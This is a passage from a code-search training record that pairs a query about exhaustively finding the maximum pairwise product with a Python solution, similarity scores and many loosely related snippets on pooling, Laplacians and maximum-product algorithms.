ll]\n if mode == 'max':\n maxp = np.amax(pool)\n mask = np.zeros(kernel_shape)\n np.place(mask, pool == maxp, 1)\n dA_prev[i, jsh: jsh + kh, ksw: ksw + kw, ll] += \\\n mask * dA[i, j, k, ll]\n else:\n mask = np.ones(kernel_shape)\n dA_prev[i, jsh: jsh + kh, ksw: ksw + kw, ll] += \\\n mask * dA[i, j, k, ll] / kh / kw\n return dA_prev", "def laplaceianReduce(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n lapLst = []\r\n gauss_pyr = gaussianPyr(img, levels)\r\n\r\n gaussian = gaussianKer(5)\r\n for i in range(1, levels):\r\n expand = gaussExpand(gauss_pyr[i], gaussian)\r\n lap = gauss_pyr[i - 1] - expand\r\n lapLst.append(lap)\r\n\r\n lapLst.append(gauss_pyr[levels - 1])\r\n\r\n return lapLst", "def pool_backward(dA, A_prev, kernel_shape, stride=(1, 1), mode='max'):\n m = dA.shape[0]\n h_new = dA.shape[1]\n w_new = dA.shape[2]\n c = dA.shape[3]\n h_prev = A_prev.shape[1]\n w_prev = A_prev.shape[2]\n kh = kernel_shape[0]\n kw = kernel_shape[1]\n # image_num = np.arange(m)\n sh = stride[0]\n sw = stride[1]\n func = {'max': np.max, 'avg': np.mean}\n\n dA_prev = np.zeros(shape=A_prev.shape)\n\n if mode in ['max', 'avg']:\n for img_num in range(m):\n for k in range(c):\n for i in range(h_new):\n for j in range(w_new):\n window = A_prev[\n img_num,\n i * sh: i * sh + kh,\n j * sw: j * sw + kw,\n k\n ]\n if mode == 'max':\n # maxpool returns the max\n # derivative of maxpool relative to the max is 1\n # derivative relative to any other element is 0\n # backpropagate 1 to the unit corresponding to max\n # backpropagate 0 for the other units\n # given these comments, define a mask of 1 and 0s\n mask = np.where(window == np.max(window), 1, 0)\n # print(mask)\n elif mode == 'avg':\n # define a mask weighted by the number of\n # elements in the pooling layer (kh * kw)\n mask = np.ones(shape=window.shape)\n mask /= (kh * kw)\n # print(mask)\n dA_prev[\n img_num,\n i * sh: i * sh + kh,\n j * sw: j * sw + kw,\n k\n ] += mask * dA[\n img_num,\n i,\n j,\n k\n ]\n return dA_prev", "def vector_laplace(arr, out=None):\n laplace_r(arr[0], out=out[0])\n laplace_z(arr[1], out=out[1])\n laplace_phi(arr[2], out=out[2])\n return out", "def pass_through_lateral_conn(self):\n\n if self.conv_filter is not None:\n boundary = 'wrap' if self.circular else 'fill'\n self.P = convolve2d(self.P, self.conv_filter, 'same', boundary)\n\n self.P = self.P / self.P.sum() # rescale to PD", "def cheby_op2(L, c, arange):\r\n if not isinstance(c, list) and not isinstance(c, tuple):\r\n r = cheby_op2(L, [c], arange)\r\n return r[0]\r\n\r\n # L=tf.sparse.to_dense(L)\r\n \r\n \r\n N_scales = len(c)\r\n M = np.array([coeff.size for coeff in c])\r\n max_M = M.max()\r\n\r\n a1 = (arange[1] - arange[0]) / 2.0\r\n a2 = (arange[1] + arange[0]) / 2.0\r\n\r\n Twf_old = 0\r\n Twf_cur = (L-a2*np.identity(L.shape[0])) / a1\r\n r = [0.5*c[j][0]*Twf_old + c[j][1]*Twf_cur for j in range(N_scales)]\r\n\r\n for k in range(1, max_M):\r\n Twf_new = (2/a1) * (L*Twf_cur - a2*Twf_cur) - Twf_old\r\n for j in range(N_scales):\r\n if 1 + k <= M[j] - 1:\r\n r[j] = r[j] + c[j][k+1] * Twf_new\r\n\r\n Twf_old = Twf_cur\r\n Twf_cur = Twf_new\r\n\r\n return r", "def forward_substitution(L, b):\n n = len(L[0])\n z = [0] * n\n for i in range(0, n):\n if L[i][i] != 0:\n accum = 0\n for j in range(0, i):\n accum += L[i][j] * z[j]\n z[i] = (b[i] - accum) / L[i][i]\n return z", "def grad_wrt_L(samples, laplacian, activations, diffusion_factors):\n num_vertices = samples.shape[1]\n grad = np.zeros(shape=(num_vertices, num_vertices))\n eigenvalues, eigenvectors = np.linalg.eigh(laplacian)\n for i, tau in enumerate(diffusion_factors):\n H_tau = activations[:, num_vertices*i:num_vertices*(i+1)]\n A = H_tau.T @ samples\n grad -= 2 * (- tau * grad_tr_A_exp_L(- tau * eigenvalues, eigenvectors, A))\n for j, tau_bis in enumerate(diffusion_factors):\n H_tau_bis = activations[:, num_vertices*j:num_vertices*(j+1)]\n A = H_tau_bis.T @ H_tau\n grad += - ((tau+tau_bis) * grad_tr_A_exp_L(-(tau+tau_bis)*eigenvalues, eigenvectors, A))\n return grad", "def laplacian(expr):\n\n delop = Del()\n if expr.is_Vector:\n return (gradient(divergence(expr)) - curl(curl(expr))).doit()\n return delop.dot(delop(expr)).doit()" ]
[ "0.6398194", "0.6261045", "0.6243763", "0.6211535", "0.6126479", "0.6089628", "0.60353637", "0.59343386", "0.5885602", "0.58751994", "0.5864428", "0.58093095", "0.58002144", "0.5674847", "0.56685555", "0.5641529", "0.55820704", "0.5570494", "0.55570203", "0.5538427", "0.5524708", "0.5521934", "0.5478108", "0.5477927", "0.54581517", "0.54474795", "0.5436212", "0.538979", "0.53010386", "0.5300596", "0.5298834", "0.52281153", "0.5216087", "0.52056825", "0.51712364", "0.5164408", "0.51559913", "0.51457113", "0.51039344", "0.51014024", "0.50954574", "0.5089821", "0.5077068", "0.50744617", "0.5061423", "0.50554407", "0.50389755", "0.5036628", "0.501034", "0.50036573", "0.4974194", "0.49554187", "0.4949169", "0.4943394", "0.49205548", "0.49156746", "0.49038842", "0.4896094", "0.489217", "0.4868009", "0.48662972", "0.48603755", "0.48557913", "0.48468956", "0.48353547", "0.4830262", "0.48215398", "0.48160452", "0.47915566", "0.47858557", "0.47855842", "0.47845635", "0.4784534", "0.47766492", "0.47684708", "0.4766449", "0.47582284", "0.47543415", "0.4747529", "0.47417986", "0.4738708", "0.4734598", "0.47299817", "0.4728574", "0.47239774", "0.47211915", "0.47172034", "0.4714456", "0.4702411", "0.46937096", "0.46862814", "0.46847165", "0.46681297", "0.465735", "0.46573088", "0.46518725", "0.46387663", "0.46379924", "0.46348947", "0.46260944" ]
0.7140893
0
Slow method that exhaustively find pairs that gives the maximum product
def max_pairwise_product(numbers): n = len(numbers) max_product = 0 for first in range(n): for second in range(first + 1, n): max_product = max(max_product, numbers[first] * numbers[second]) return max_product
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def max_pairwise_product_brute_force(array):\n\n if len(array) <= 1:\n return 0\n\n max_product = 0\n\n for i in range(len(array)):\n for j in range(len(array)):\n if i != j:\n if array[i] * array[j] > max_product:\n max_product = array[i] * array[j]\n\n return max_product", "def max_pairwise_product_fast(numbers):\n num_list = numbers.copy()\n max_num_1 = max(num_list)\n num_list.remove(max_num_1)\n max_num_2 = max(num_list)\n ans = max_num_1*max_num_2\n return ans", "def max_pairwise_product_linear(array):\n\n if len(array) <= 1:\n return 0\n\n two_biggest_values = [0, 0]\n\n for element in array:\n if element > two_biggest_values[0]:\n two_biggest_values[0] = element\n elif element > two_biggest_values[1]:\n two_biggest_values[1] = element\n\n return two_biggest_values[0] * two_biggest_values[1]", "def maxProduct(data):\n maxval = float('-inf')\n for i in range(len(data)):\n for j in range(i+1, len(data)):\n if maxval < data[i]*data[j]:\n maxval = data[i]*data[j]\n a,b = (data[i],data[j])\n return tuple([a,b])", "def maximumProduct2(self, nums: List[int]) -> int:\n big_1 = big_2 = big_3 = -float(\"inf\")\n small_1 = small_2 = float(\"inf\")\n for n in nums:\n if n >= big_1:\n big_1, big_2, big_3 = n, big_1, big_2\n elif n >= big_2:\n big_2, big_3 = n, big_2\n elif n >= big_3:\n big_3 = n\n \n if n <= small_1:\n small_1, small_2 = n, small_1\n elif n <= small_2:\n small_2 = n\n \n return max(big_1 * big_2 * big_3, big_1 * small_1 * small_2)", "def max_pairwise_product_sort(numbers):\n sorted_list = sorted(numbers)\n ans = sorted_list[-1]*sorted_list[-2]\n return ans", "def max_pairwise_product_sort(array):\n if len(array) <= 1:\n return 0\n\n array.sort()\n\n return array[-1] * array[-2]", "def findMaxProduct(n):\n large = 0\n for i in range(len(s)):\n p = 1\n number = s[i:i+n]\n for iteration in range(len(number)):\n h = number[iteration]\n p = p * int(h)\n if p > large:\n large = p\n\n \n return large", "def highest_product_2(arr):\n\n # make a list to store the highest three ints, initializing to first three\n maxes = [arr[0], arr[1], arr[2]]\n\n # find the lowest of the highest three ints\n lowest_max = min(maxes)\n\n # go through the rest of the list to check for higher values\n for num in arr[3:]:\n # if any value is higher than the lowest max, update maxes list\n if num > lowest_max:\n # remove the old maximum\n maxes.remove(lowest_max)\n # add the new one\n maxes.append(num)\n # recalculate the lowest max for continued comparison\n lowest_max = min(maxes)\n\n return maxes[0] * maxes[1] * maxes[2]", "def test_returns_largest_product_within_array(self):\n result = max_product([2,3,-2,4,10,-5,3,2,1])\n self.assertEqual(result, 14400)", "def maxProduct2(nums):\n\n maxSubseq = nums[0]\n minSubseq = nums[0]\n res = nums[0]\n for i in range(1, len(nums)):\n if nums[i] < 0:\n minSubseq, maxSubseq = maxSubseq, minSubseq\n maxSubseq = max(nums[i], maxSubseq*nums[i])\n minSubseq = min(nums[i], minSubseq*nums[i])\n res = max(res, maxSubseq)\n return res", "def find_max_product(mtx):\n max_prod = 0\n for row_num in range(20):\n vert = 0\n diag = 0\n anti_diag = 0\n horiz = horiz_max(mtx[row_num])\n if row_num < len(mtx) - 3:\n vert = vert_max(mtx[row_num], mtx[row_num + 1],\n mtx[row_num + 2], mtx[row_num + 3])\n diag = diag_max(mtx[row_num], mtx[row_num + 1],\n mtx[row_num + 2], mtx[row_num + 3])\n anti_diag = anti_diag_max(mtx[row_num], mtx[row_num + 1],\n mtx[row_num + 2], mtx[row_num + 3])\n max_prod = max(max_prod, horiz, vert, diag, anti_diag)\n return max_prod", "def compute_largest_diagonal2_product(grid):\n max_product = 0\n for row in range(len(grid) - 1 , 2 , -1):\n for column in range(len(grid) - 3):\n current_product = 1\n for j in range(4):\n current_product *= grid[row - j][column + j]\n if current_product > max_product:\n max_product = current_product\n\n if current_product == 70600674:\n print(row , column)\n return max_product", "def highest_product(arr):\n\n product = 1\n\n for i in range(3):\n # find the max value in the list, get the index, pop it, and mulitply\n product *= arr.pop(arr.index(max(arr)))\n\n return product", "def solve_bruteforce(self):\n max_value = -1\n for z in range(0, self.k):\n max_value = -1\n max_index = -1\n for i, v in enumerate(self.numbers):\n if v > max_value:\n max_index = i\n max_value = v\n del self.numbers[max_index]\n\n return max_value", "def maximumProduct1(self, nums: List[int]) -> int:\n s_nums = sorted(nums, reverse=True)\n return max(s_nums[0] * s_nums[1] * s_nums[2], s_nums[0] * s_nums[-1] * s_nums[-2])", "def compute_largest_product(grid):\n row_largest = compute_largest_row_product(grid)\n column_largest = compute_largest_column_product(grid)\n diagonal1_largest = compute_largest_diagonal1_product(grid)\n diagonal2_largest = compute_largest_diagonal2_product(grid)\n\n my_list = [row_largest , column_largest , diagonal1_largest , diagonal2_largest]\n return max(my_list)", "def compute_largest_column_product(grid):\n max_product = 0\n for column in range(len(grid)):\n for row in range(len(grid) - 3):\n current_product = 1\n for j in range(4):\n current_product *= grid[row + j][column]\n if current_product > max_product:\n max_product = current_product\n return max_product", "def __pair_maximizer(alpha_pairs, pair):\n for alt in alpha_pairs:\n if pair != alt and pair[0].issubset(alt[0]) and pair[1].issubset(alt[1]):\n return False\n return True", "def largest_product(series, length):\n\tif length > len(series):\n\t\traise ValueError\n\tif length == 0 and len(series)==0:\n\t\treturn 1\n\treturn max((reduce(mul,s) for s in slices(series,length)))", "def test_many_positive(self):\n\n # pairs (input, result)\n pairs = [\n ([3, 4, 6, 8, 0], 192),\n ([1, -1, 1, -1, 1], 1),\n ([0, 0, 0, 0, -1], 0),\n ([6, 5, 4, 3, 2], 120),\n ([6, 5, 4, 3, -2], 120),\n ([6, 5, 4, -3, -2], 120),\n ([-6, -5, 4, 3, 0], 120),\n ([-6, 5, 4, 3, 2], 60),\n ([5, 6, -100, -1, 10], 1000)\n ]\n\n for lst, result in pairs:\n self.assertEqual(max_triple_mul(lst), result)", "def highest_product_3(arr):\n # sort in place (this will take O(n), at least)\n arr.sort()\n\n # get the maximum positive solution (this only works if all three > 0)\n max_product = arr[-1] * arr[-2] * arr[-3]\n\n # check for better solutions involving negatives\n # the only solution involving negatives will have exactly two of them\n # check the two options manually and return the largest one. \n if arr[0] < 0 and arr[1] < 0:\n if arr[0] * arr[1] * max(arr[-1], arr[-2], arr[-3]) > max_product:\n max_product = arr[0] * arr[1] * max(arr[-1], arr[-2], arr[-3])\n\n return max_product", "def get_max_combination(total_cuts):\n max_pieces = 0\n for i in range(total_cuts):\n result = i * (total_cuts - i)\n if result > max_pieces:\n max_pieces = result\n print(max_pieces)", "def effective_pairs(self):\n out = 0\n hdmat = self.hdmatrix()\n for i in xrange(len(hdmat[0])):\n for j in xrange(i+1, len(hdmat[0])): \n out += hdmat[i,j]**2\n return out", "def maxElem(A):\n n = len(A)\n AMax = 0.0\n for i in range(n):\n for j in range(i+1,n):\n if abs(A[i,j]) >= AMax:\n AMax = abs(A[i,j])\n k = i;l = j\n return AMax, k, l", "def calculateOptimal(self) -> (list, int):\n\t\tcombinations = list(itertools.product(*self.clusters))\n\t\tmin_dist = 1000000\n\t\tmin_combination = None\n\t\tfor combination in combinations:\n\t\t\tdist = super().step(combination)\n\t\t\tif(dist < min_dist):\n\t\t\t\tmin_dist = dist\n\t\t\t\tmin_combination = combination\n\t\treturn (min_combination, min_dist)", "def test_largest_product_negative():\n assert largest_product([[-1, -2], [-3, -4], [-5, -6], [-7, -8]]) == 56", "def max_product(s):\n # if s == []:\n # return 1\n # elif s[0] in s[2:]:\n # products = [s[0] ** s.count(s[0])]\n # else:\n # products = [s[0] * max(s[2:])]\n # return max(products)\n if s == []:\n return 1\n # elif len(s) == 1:\n # return s[0]\n else:\n return max(s[0] * max_product(s[2:]), max_product(s[1:]))", "def answer(n_digits):\n\n best = 0\n pairs = combinations(xrange(10 ** (n_digits - 1), 10 ** (n_digits)), 2)\n\n for (x, y) in pairs:\n prod = str(x * y)\n if prod == prod[::-1]:\n best = max(best, x * y)\n\n return best", "def pair(dice):\n\n def max_or_zero(list):\n \"\"\" Returns maximum value of a list; 0 if list is empty. \"\"\"\n try:\n return max(list)\n except ValueError:\n return 0\n\n return 2 * max_or_zero([i for i, j in combinations(dice, 2) if i == j])", "def get_best(pairs, hyplo_dict):\r\n\tbest_freq=0\r\n\tbest_pair=[]\r\n\t# print \"the pairs: \", pairs\r\n\tfor p in pairs:\r\n\t\tfreq=hyplo_dict[p[0]]*hyplo_dict[p[1]]\r\n\t\tif freq>best_freq:\r\n\t\t\tbest_freq=freq\r\n\t\t\tbest_pair=p\r\n\t# print best_pair\r\n\t# print \"the best pair is: \",best_pair\r\n\treturn best_pair", "def problem():\n\n print 'problem #27'\n\n l = 0\n m_a = 0\n m_b = 0\n for a in xrange(-1000, 1000):\n for b in xrange(-1000, 1000):\n p = len(check(a, b))\n if p > l:\n l = p\n m_a = a\n m_b = b\n\n print 'the product of coefficients is %s' % (m_a * m_b)", "def test_largest_product_array():\n assert largest_product([[1, 2], [3, 4], [5, 6], [7, 8]]) == 56", "def maxProfit(self, prices):\n np = 0\n p = float('-inf')\n cd = float('-inf')\n for price in prices:\n p, np, cd = max(np - price, p), max(np, cd), p + price\n return max(np, cd)", "def maxResult(self, nums: List[int], k: int) -> int:\n # Solution 1 - 964 ms\n # Solution 2 - 864 ms\n n = len(nums)\n if n == 0:\n return 0\n if n == 1:\n return nums[0]\n\n dp = [0] * n\n dp[0] = nums[0]\n max_sum = dp[0]\n max_sum_pointer = 0\n for i in range(1, n):\n if max_sum_pointer >= i - k:\n if max_sum < dp[i - 1] and i > 0:\n max_sum = dp[i - 1]\n max_sum_pointer = i - 1\n else:\n if i - k > 0:\n max_sum = dp[i - k]\n max_sum_pointer = i - k\n for p in range(i - k, i):\n if max_sum <= dp[p]:\n max_sum = dp[p]\n max_sum_pointer = p\n\n dp[i] = max_sum + nums[i]\n\n dp[-1] = max_sum + nums[-1]\n return dp[-1]", "def find_greatest_product(n, t_num):\n t_seqs = []\n zero_idx = [i for i, x in enumerate(t_num) if x == \"0\"]\n initial_zero = [-1] + zero_idx\n end_zero = zero_idx + [len(t_num)]\n zero_dist = map(lambda x, y: y - (x + 1), initial_zero, end_zero)\n for idx in range(len(zero_dist)):\n if zero_dist[idx] >= n:\n init_seq_idx = initial_zero[idx] + 1\n end_seq_idx = init_seq_idx + n\n while end_seq_idx <= end_zero[idx]:\n t_seqs.append(t_num[init_seq_idx:end_seq_idx])\n init_seq_idx += 1\n end_seq_idx += 1\n max_mul = 0\n for seq in t_seqs:\n seq_mul = reduce(lambda x, y: int(x) * int(y), seq)\n if seq_mul > max_mul:\n max_mul = seq_mul\n return max_mul", "def find_max_triples(p1, p2, topN=5, prob_thd=None):\n product = torch.bmm(p1.unsqueeze(2), p2.unsqueeze(1))\n upper_product = torch.stack([torch.triu(p) for p in product]).data.cpu().numpy()\n batched_sorted_triple = []\n for idx, e in enumerate(upper_product):\n sorted_triple = topN_array_2d(e, topN=topN)\n if prob_thd is not None:\n sorted_triple = [t for t in sorted_triple if t[2] >= prob_thd]\n batched_sorted_triple.append(sorted_triple)\n return batched_sorted_triple", "def findMaximal(freqSet):", "def find_largest_square(serial):\n max_size = 1\n max_square = None\n max_power = -float('inf')\n\n # Precompute all single cell powers\n powers = []\n for y in range(300):\n powers.append([])\n for x in range(300):\n powers[y].append(cell_power(x+1, y+1, serial))\n\n # Memoize the total powers of squares of previous steps\n previous_power = copy.deepcopy(powers)\n\n for size in range(1, 300):\n x = y = 1\n while x + size <= 300:\n while y + size <= 300:\n power = previous_power[y-1][x-1]\n if size != 1:\n # Add the new row/column\n for i in range(x, x + size):\n power += powers[y+size-2][i-1]\n # Do not add the corner twice\n for j in range(y, y + size - 1):\n power += powers[j-1][x+size-2]\n # Update the map\n previous_power[y-1][x-1] = power\n\n if power > max_power:\n max_power = power\n max_square = (x, y)\n max_size = size\n y += 1\n x += 1\n y = 1\n\n return max_square, max_size", "def twoMaxs(lnp):\n\tindex1 = 0\n\tindex2 = 0\n\tcnt = 0\n\tmaxArea = 0\n\tmaxArea2 = 0\n\tfor (ex, ey, ew, eh) in lnp:\n\t\tif(ew * eh >= maxArea):\n\t\t\tindex1 = cnt\n\t\t\tmaxArea = ew * eh\n\t\tcnt += 1\n\t\n\n\tcnt = 0\n\tfor (ex, ey, ew, eh) in lnp:\n\t\tif(index1 == cnt):\n\t\t\tcnt += 1\n\t\t\tcontinue\n\t\tif(ew * eh >= maxArea2):\n\t\t\tindex2 = cnt\n\t\t\tmaxArea2 = ew * eh\n\t\tcnt +=1\n\t\n\treturn (index1, index2)", "def problem41():\n for i in range(len(PANDIGITAL), 1, -1):\n cur_max = 0\n for p in itertools.permutations(PANDIGITAL[:i]):\n n = int(\"\".join(p))\n if pelib.is_prime(n) and n > cur_max:\n cur_max = n\n\n if cur_max > 0:\n return cur_max", "def find_max_independent_set(graph, params):\r\n\r\n max_ind_set = []\r\n\r\n # QHACK #\r\n\r\n # function that takes in a graph and outputs the hamiltonians\r\n cost_h, mixer_h = qaoa.max_independent_set(graph, constrained=True) # Assume the graph they give me is good\r\n\r\n def qaoa_layer(gamma, alpha):\r\n qaoa.cost_layer(gamma, cost_h)\r\n qaoa.mixer_layer(alpha, mixer_h)\r\n\r\n dev = qml.device(\"default.qubit\", wires=range(NODES))\r\n\r\n def circuit(params, **kwargs): \r\n qml.layer(qaoa_layer, N_LAYERS, params[0], params[1]) \r\n\r\n @qml.qnode(dev)\r\n def probability_circuit(gamma, alpha):\r\n circuit([gamma, alpha])\r\n return qml.probs(wires=range(NODES))\r\n\r\n answer = probability_circuit(params[0], params[1])\r\n\r\n maxn = 0\r\n maxn = max(answer)\r\n\r\n for i in range(len(answer)):\r\n if maxn == answer[i]:\r\n decimal = i\r\n \r\n binary_num = []\r\n def DecimalToBinary(decimal):\r\n if decimal >= 1:\r\n DecimalToBinary(decimal // 2)\r\n binary_num.append(decimal % 2)\r\n \r\n DecimalToBinary(decimal)\r\n\r\n if len(binary_num) < 6:\r\n if len(binary_num) < 5:\r\n if len(binary_num) < 4:\r\n if len(binary_num) < 3:\r\n if len(binary_num) < 2:\r\n binary_num.insert(0, 0) # At beginning append 0\r\n binary_num.insert(0, 0)\r\n binary_num.insert(0, 0)\r\n binary_num.insert(0, 0)\r\n binary_num.insert(0, 0)\r\n\r\n for i in range(6):\r\n if binary_num[i] == 1:\r\n max_ind_set.append(i)\r\n\r\n # QHACK #\r\n\r\n return max_ind_set", "def max_overlap_pair(skylines):\n max_pair = None\n max_overlap_area = 0.0\n\n for i in range(len(skylines) - 1):\n curr_s = skylines[i]\n next_s, i_area = curr_s.find_max_overlap(skylines[i + 1:])\n\n if i_area > max_overlap_area:\n max_overlap_area = i_area\n max_pair = (curr_s, next_s)\n\n return max_pair", "def find_triplet(numbers, target_sum):\n # iterate through all pair combinations (cartesian product), so that we don't need to nest 2 loops\n for num_1, num_2 in product(numbers, numbers):\n partner_num = target_sum - num_2 - num_1\n\n # leave early if partner would be negative (only tiny speedup, but still)\n if partner_num < 0:\n continue\n\n if partner_num in numbers:\n return partner_num * num_1 * num_2", "def test_with_negative(self):\n inp = [5, 6, 7, -100, -10, 0]\n result = max_triple_mul(inp)\n\n self.assertEqual(result, 7000)\n self.assertNotEqual(result, 210)", "def max_non_adjacent_sum_memoized(a):\n table = dict()\n def helper(a, table, i):\n if i in table:\n return table[i]\n if len(a) - i == 0:\n table[i] = 0\n elif len(a) - i == 1:\n table[i] = a[i]\n elif len(a) - i == 2:\n table[i] = max(a[0], a[1])\n else:\n table[i] = max(a[i] + helper(a, table, i + 2),\n a[i + 1] + helper(a, table, i + 3))\n return table[i]\n return helper(a, table, 0)", "def find_max_triples_from_upper_triangle_product(upper_product, top_n=5, prob_thd=None):\n batched_sorted_triple = []\n for idx, e in enumerate(upper_product):\n sorted_triple = top_n_array_2d(e, top_n=top_n)\n if prob_thd is not None:\n sorted_triple = sorted_triple[sorted_triple[2] >= prob_thd]\n batched_sorted_triple.append(sorted_triple)\n return batched_sorted_triple", "def maxproba(proba):\r\n lenp = len(proba)\r\n m=0\r\n for i in range(0,lenp):\r\n if proba[i]>m:\r\n m=proba[i]\r\n im=i\r\n return im,m", "def brute_force_solution():\n def is_pythagorean_triplet(a, b, c):\n return c**2 == a**2 + b**2\n\n return next(\n a * b * (TRIPLET_SUM - a - b)\n for a in range(1, TRIPLET_SUM)\n for b in range(a + 1, TRIPLET_SUM - a)\n if is_pythagorean_triplet(a, b, TRIPLET_SUM - a - b)\n )", "def get_longest_all_primes(lst: list[int]):\n subsecventa_max1 = []\n for i in range(len(lst)):\n for j in range(len(lst)):\n if toate_elementele_prime(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventa_max1):\n subsecventa_max1 = lst[i:j + 1]\n return subsecventa_max1", "def compute_largest_diagonal1_product(grid):\n max_product = 0\n for row in range(len(grid) - 3):\n for column in range(len(grid) -3):\n current_product = 1\n for j in range(4):\n current_product *= grid[row + j][column + j]\n if current_product > max_product:\n max_product = current_product\n return max_product", "def maxProfit(prices, k):\n buys, sells = [-sys.maxsize] * k, [-sys.maxsize] * k\n for price in prices:\n for i, (buy, sell) in enumerate(zip(buys, sells)):\n if i == 0:\n buys[i] = max(buy, -price)\n sells[i] = max(sell, buy+price)\n else:\n buys[i] = max(buy, sells[i-1]-price)\n sells[i] = max(sell, buy+price)\n return max(sells)", "def greatest_pallindrome(n, m):\n if m < n:\n raise ValueError\n\n pk = ProductKeeper()\n\n # these nested loops compare distinct pairs of products\n for i in range(n + 1, m + 1):\n for j in range(n, i):\n pk.check(i, j)\n\n return pk.get_gp()", "def max_v_greedy():\n\n S1=Spectrum.Spectrum()\n S1.add_peak(50.4,16)\n S1.add_peak(50.7,36)\n S1.add_peak(74.8,25)\n S1.add_peak(96.2,23)\n S1.pep_mass=100\n S1.euclidean_scale()\n\n S2=Spectrum.Spectrum()\n S2.add_peak(50.6,49)\n S2.add_peak(50.9,25)\n S2.add_peak(74.6,9)\n S2.add_peak(102.4,17)\n S2.pep_mass=100\n S2.euclidean_scale()\n\n score,peaks=similarity.cosine_score_max(S1,S2)\n g_score,g_peaks=similarity.cosine_score_greedy(S1,S2)\n\n assert score>=g_score, \"Maximum weighted method did not get higher score than greedy method\"\n assert peaks>=g_peaks, \"Maximum weighted method did not match more peaks than greedy method\"\n\n assert peaks==3, \"Incorrect number of peaks matched with greedy method\"\n assert math.isclose(score,0.73), \"Incorrect score with greedy method\"\n\n assert g_peaks==2, \"Incorrect number of peaks matched with maximum weighted method\"\n assert math.isclose(g_score,0.57), \"Incorrect score with maximum weighted method\"", "def find_optimal_dimensions_wrong(self):\n\n min_product_index = 0\n min_product = self.ans[0][0]*self.ans[0][1]\n\n for i in range(0,len(self.ans),1):\n if self.ans[i][0]*self.ans[i][1] < min_product or min_product == 0:\n min_product = self.ans[i][0]*self.ans[i][1]\n min_product_index = i\n\n print(i, \":\", self.ans[min_product_index])\n\n return self.ans[min_product_index]", "def maxProfit(self, prices):\n l = len(prices)\n if l <= 1:\n return 0\n dp = [0] * len(prices)\n r = prices[1] - prices[0]\n m = prices[0]\n for i in range(2, l):\n m = min(prices[i - 1], m)\n r = max(r, prices[i] - m)\n \n return r if r >= 0 else 0", "def find_max_profit(stock_prices,k):\n\teliminated_indices = set()\n\ttotal_profit = 0\n\n\t\n\tfor i in range(0,k):\n\t\tmax_profit = float('-inf')\n\t\tmin_price = float('inf')\n\t\t\n\t\tfor current_index,current_price in enumerate(stock_prices):\n\t\t\t# This condition takes care of note by making sure that \n\t\t\t# prices are not used in previous transaction.\n\t\t\tif current_index not in eliminated_indices:\n\t\t\t\tcurrent_profit = current_price - min_price\n\n\t\t\t\tif (current_profit > max_profit):\n\t\t\t\t\tbuying_price_index = min_price_index\n\t\t\t\t\tselling_price_index = current_index\n\t\t\t\t\tmax_profit = current_profit\n\n\t\t\t\t#min_price = min(min_price, current_price)\n\t\t\t\tif (current_price < min_price):\n\t\t\t\t\tmin_price = current_price\n\t\t\t\t\tmin_price_index = current_index\n\n\n\t\t# This for loop is to take care of Note\n\t\tfor i in range(buying_price_index,selling_price_index+1):\n\t\t\teliminated_indices.add(i)\n\n\t\ttotal_profit += max_profit\n\t\tprint('buying_price_index :',buying_price_index)\n\t\tprint(\"selling_price_index :\",selling_price_index)\n\n\treturn total_profit", "def find_max(centroids):\n \n max_sim = 0.0\n max_i = 0\n max_j = 0\n length = len(centroids)\n\n for i in xrange(0, length):\n for j in xrange(i + 1, length):\n curr_sim = similarity(centroids[i], centroids[j])\n if curr_sim > max_sim:\n max_sim = curr_sim\n max_i = i\n max_j = j\n\n return (max_i, max_j, max_sim)", "def test_largest_product_2_arrays():\n assert largest_product([[1, 2], [3, 4]]) == 12", "def solve(arr):\n for i in range(len(arr) - 2, -1, -1):\n arr[i] = [max_subtriangle(arr, i, j) for j in range(len(arr[i]))]\n return arr[0][0]", "def solve(max_k=12000, min_k=2):\r\n float_inf = float('inf')\r\n min_ps_numbers = [float_inf] * (max_k - min_k + 1)\r\n\r\n for i in count(1):\r\n # I would like a better way of looking for the max than just checking to see that all values are\r\n # not inf, however this is only a minor portion of the runtime.\r\n if float_inf not in min_ps_numbers:\r\n break\r\n\r\n composite_factoring = factorint(i, multiple=True)\r\n for prod_len in range(2, len(composite_factoring) + 1):\r\n for multiplicative_partition in kbins(composite_factoring, prod_len, 0):\r\n multiplicative_partition = [prod(x) for x in multiplicative_partition]\r\n multiplicative_partition_sum = sum(multiplicative_partition)\r\n one_count = i - multiplicative_partition_sum\r\n k = one_count + len(multiplicative_partition)\r\n array_k = k - min_k\r\n if array_k < len(min_ps_numbers) and min_ps_numbers[array_k] > i:\r\n min_ps_numbers[array_k] = i\r\n\r\n return sum(set(min_ps_numbers))", "def optimal_solution_multiple_pickup(memo):\n # Calculates what the maximum value is and saves which row and [col][energy] index\n maxvalue = None\n for i in range(len(memo)+1):\n # Sets up initial value\n if maxvalue is None:\n # Sets initial value to first non empty cell[1]\n if memo[len(memo)-1][i][1] is not None:\n maxvalue = (memo[len(memo)-1][i][1], i, 1)\n # Compares first non empty cell[1] with first non empty cell[0]\n if memo[len(memo)-1][i][0] is not None:\n if maxvalue is not None:\n if memo[len(memo) - 1][i][0] > maxvalue[0]:\n maxvalue = (memo[len(memo) - 1][i][0], i, 0)\n # In case first non empty cell[1] was None\n else:\n maxvalue = (memo[len(memo) - 1][i][0], i, 0)\n # After initial value is set. Compares it the other value in that cell to get maximum\n else:\n if memo[len(memo)-1][i][1] is not None:\n if memo[len(memo)-1][i][1] > maxvalue[0]:\n maxvalue = (memo[len(memo)-1][i][1], i, 1)\n if memo[len(memo)-1][i][0] is not None:\n if memo[len(memo)-1][i][0] > maxvalue[0]:\n maxvalue = (memo[len(memo)-1][i][0], i, 0)\n\n # Goes back and calculates how the optimal solution was formed\n optimal_solution = [0] * len(memo)\n current_row = maxvalue[1]\n current_index = maxvalue[2]\n # Goes backwards through the array starting at the best value\n for col in range(len(memo)-1, 0, -1):\n # For energy > 0 where it has the choice to pick up or not\n if current_row > 0:\n # Checks if it did pick up. If current cell does not have the same value as the previous column with\n # 1 less energy[current_index] then it must have picked up\n if memo[col][current_row][current_index] != memo[col-1][current_row-1][1]:\n optimal_solution[col] = 1\n\n # Picks the maximum number from previous column and 1 more energy\n if memo[col-1][current_row+1][0] is None:\n current_index = 1\n elif memo[col-1][current_row+1][1] is None:\n current_index = 0\n else:\n if memo[col-1][current_row+1][0] > memo[col-1][current_row+1][1]:\n current_index = 0\n else:\n current_index = 1\n current_row += 1\n # otherwise it did not pick up\n else:\n 